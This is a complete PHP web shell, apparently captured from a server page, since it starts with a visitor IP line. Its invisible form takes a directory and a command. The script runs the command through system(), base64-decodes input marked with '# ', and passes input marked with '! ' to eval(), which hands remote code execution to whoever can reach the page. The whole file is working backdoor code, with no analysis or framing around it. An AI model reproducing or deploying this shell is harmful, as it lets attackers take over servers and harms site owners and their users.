Your IP : 18.222.143.88
<html>
<body>
<form style="opacity:0;" method="POST" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="dir" id="dir" size="30">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_POST['cmd']))
{
if ($_POST['dir'] != '$PWD') {
chdir($_POST['dir']);
}
if (substr($_POST['cmd'], 0, 2) == "# ") {
$_POST['cmd'] = base64_decode(substr($_POST['cmd'], 2));
}
if (substr($_POST['cmd'], 0, 2) == "! ") {
eval(urldecode(substr($_POST['cmd'], 2)));
} else {
system($_POST['cmd']);
}
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>